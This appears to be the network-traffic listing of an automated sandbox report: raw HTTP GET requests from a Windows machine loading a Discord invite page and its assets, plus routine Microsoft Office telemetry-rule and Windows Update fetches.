                          Source: global trafficHTTP traffic detected: GET /BNXa5rYFXM HTTP/1.1Host: discord.ggConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                          Source: global trafficHTTP traffic detected: GET /invite/BNXa5rYFXM HTTP/1.1Host: discord.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                          Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
                          Source: global trafficHTTP traffic detected: GET /assets/69646.32a83a0c7e0a41f066e8.css HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://discord.com/invite/BNXa5rYFXMAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000
                          Source: global trafficHTTP traffic detected: GET /assets/webMinimal.3d98e446c302b2b42423.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/BNXa5rYFXMAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000
                          Source: global trafficHTTP traffic detected: GET /assets/sentry.0a75547723fa3698c125.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/BNXa5rYFXMAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000
                          Source: global trafficHTTP traffic detected: GET /assets/sentry.0a75547723fa3698c125.js HTTP/1.1Host: discord.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000
                          Source: global trafficHTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=CP4fkenoRh1CF+c&MD=1vLSVSte HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
                          Source: global trafficHTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /assets/webMinimal.3d98e446c302b2b42423.js HTTP/1.1Host: discord.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000
                          Source: global trafficHTTP traffic detected: GET /assets/8234e0a75aa9afb205bd.woff2 HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://discord.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://discord.com/assets/69646.32a83a0c7e0a41f066e8.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000
                          Source: global trafficHTTP traffic detected: GET /assets/b21c5111a12372139409.woff2 HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://discord.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://discord.com/assets/69646.32a83a0c7e0a41f066e8.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000
                          Source: global trafficHTTP traffic detected: GET /assets/8bd8143eff37936894aa.woff2 HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://discord.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://discord.com/assets/69646.32a83a0c7e0a41f066e8.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000
                          Source: global trafficHTTP traffic detected: GET /assets/452d7be36bf4b23241bd.woff2 HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://discord.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://discord.com/assets/69646.32a83a0c7e0a41f066e8.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000
                          Source: global trafficHTTP traffic detected: GET /assets/48a594e29497835802fe.woff2 HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://discord.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://discord.com/assets/69646.32a83a0c7e0a41f066e8.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000
                          Source: global trafficHTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /assets/f5b8aa3411dfc24ff2e6.woff2 HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://discord.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://discord.com/assets/69646.32a83a0c7e0a41f066e8.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000
                          Source: global trafficHTTP traffic detected: GET /api/v9/experiments?with_guild_experiments=true HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"X-Super-Properties: eyJvcyI6IldpbmRvd3MiLCJicm93c2VyIjoiQ2hyb21lIiwiZGV2aWNlIjoiIiwic3lzdGVtX2xvY2FsZSI6ImVuLVVTIiwiYnJvd3Nlcl91c2VyX2FnZW50IjoiTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzExNy4wLjAuMCBTYWZhcmkvNTM3LjM2IiwiYnJvd3Nlcl92ZXJzaW9uIjoiMTE3LjAuMC4wIiwib3NfdmVyc2lvbiI6IjEwIiwicmVmZXJyZXIiOiIiLCJyZWZlcnJpbmdfZG9tYWluIjoiIiwicmVmZXJyZXJfY3VycmVudCI6IiIsInJlZmVycmluZ19kb21haW5fY3VycmVudCI6IiIsInJlbGVhc2VfY2hhbm5lbCI6InN0YWJsZSIsImNsaWVudF9idWlsZF9udW1iZXIiOjM0NzY5MSwiY2xpZW50X2V2ZW50X3NvdXJjZSI6bnVsbH0=X-Context-Properties: eyJsb2NhdGlvbiI6IkFjY2VwdCBJbnZpdGUgUGFnZSJ9X-Debug-Options: bugReporterEnabledsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36X-Discord-Timezone: America/New_YorkX-Discord-Locale: en-USsec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://discord.com/invite/BNXa5rYFXMAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000
                          Source: global trafficHTTP traffic detected: GET /assets/ac625b77a0bab0ee72df.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: same-originSec-Fetch-Dest: workerReferer: https://discord.com/invite/BNXa5rYFXMAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000
                          Source: global trafficHTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /assets/1098b8da25f51e58cea4.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/BNXa5rYFXMAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000
                          Source: global trafficHTTP traffic detected: GET /assets/0a52c6142094387fceed.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/BNXa5rYFXMAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000
                          Source: global trafficHTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /assets/8143f89919f42e84b455.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/BNXa5rYFXMAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000
                          Source: global trafficHTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
